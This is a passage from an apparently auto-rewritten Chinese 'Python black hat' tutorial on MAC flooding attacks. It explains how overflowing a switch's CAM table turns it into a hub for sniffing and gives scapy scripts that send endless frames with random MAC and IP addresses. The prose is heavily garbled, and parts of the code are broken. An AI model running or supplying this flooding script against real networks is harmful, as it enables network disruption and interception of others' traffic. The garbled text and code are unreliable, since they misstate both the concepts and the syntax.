Menu
0 Comments

Python黑帽编程 3.3 MAC洪水攻击 – 玄魂工作室

全体与会者配电盘(我只结帐我现时的运用的互相作用的机具)。,依据心灵树或花草结果却为了表述)在唱片转发工序中依赖对CAM表的查询来决定优美的的转发界面,有关的的MAC的对应入场不克不及在曲中找到。,这样地唱片帧将被处置为播送帧。。凸轮台的性能是稍许地的。,仅仅小半以协议约束可以贮存。,当凸轮表的MAC地址到达上限时,新的入场将不克添加到CAM表中。。

由于前述事项信条,本人会查明随便哪一个人绝风趣的景象。。PC陆续发送唱片帧到未知终点站。,每个唱片包的源MAC地址差别,当这些子群以十足快的枯萎:使枯萎发送时,在恢复活力时间内提取岩芯地填鞭打的凸轮表。。这些伪造的MAC地址职业了CAM表。,真马 C地址入场无法进入CAM表。。经过配电盘的随便哪一个精神健全的单播唱片帧都是PROC。。在这种情况下,配电盘被使丢脸为集中器。。

当配电盘被使丢脸为集中器后,,本人可以监控连接到配电盘征服的财产唱片。。

自然,详细互相作用的稳固对ARP洪水的答辩是相异点的,现场结帐是基本的的。。现时让本人进入预调并置。。

编码技击术

有很多地办法来证明随机MAC和IP地址。,由于地址的规范体式是在的。,不费力地拼凑。在这里要给尽量的绍介的是scapy模块说话中肯RandMAC和RandIP办法。这两种办法用于随机构造MAC地址和IP地址。,接纳模板参量的办法,构造特定的段的地址。。

譬如,上面的约定遗传密码:

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandMAC()

    print RandIP()

    i=i-1

树或花草结果如次所示。:

图2

也许需求IP来构造合格的的系统段,您可以输出约定的模板。。

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandIP(“.*”)

    i=i-1

运转树或花草结果如次:

图3

在求解随机成绩后来地,现时让本人思索哪样的唱片包可以到达这样地作用。让本人,提供本人在包中有约定的源IP和MAC,而且鞭打将被记载决定并宣布。。

譬如ARP包:

Ether(SRC)RandMAC(),dst=FF:FF:FF:FF:FF:FFARP(OP)2,
psrc=
“”, hwdst=FF:FF:FF:FF:FF:FF)/Padding(装满)“X”*18))

譬如,ICMP包装袋。:

Ether(SRC)RandMAC(“*:*:*:*:*:*”),

dst=RandMAC(“*:*:*:*:*:*”)) / \

IP(SRC)RandIP(“*.*.*.*”),

dst=RandIP(“*.*.*.*”)) / \

ICMP()

处理了这两个提取岩芯成绩。,你可以写出极其的约定遗传密码。:

图4

#!/usr/bin/python

import sys

from scapy.all import *

import time

iface=”eth0″

if Le())> 2

    iface=[1]

(1)

    packet= Ether(SRC)RandMAC(“*:*:*:*:*:*”),

                  dst=RandMAC(“*:*:*:*:*:*”)) / \

    IP(SRC)RandIP(“*.*.*.*”),

    dst=RandIP(“*.*.*.*”)) / \

    ICMP()

    ()

    sendp(packet,iface=iface,loop=0)

前述的约定遗传密码陆续发送ICMP唱片包。,来达到预期的目的MAC洪水攻击。运转树或花草结果如次:

图5

2总结

在本条中,预调中缺勤新的东西值当根究。,预期对作物物交换系统和以太网有必然的相识的人。。

下一节,让本人来谈谈VLAN攻击。。

VLAN攻击党派已在WeChat订阅号中发行物。,热情的先生输出订阅号码(在水下二维码),从菜单栏> Python黑帽预调,您可以进入。。

检查极其的私人教师的摆放餐具,请睬我的微信订阅号(宣匈521),下二维码,恢复蟒。成绩议论请加QQ群。:Hacking (1群):303242737   Hacking (2群):147098303。

 

不可思议的灵魂字间间隔

发表评论

电子邮件地址不会被公开。 必填项已用*标注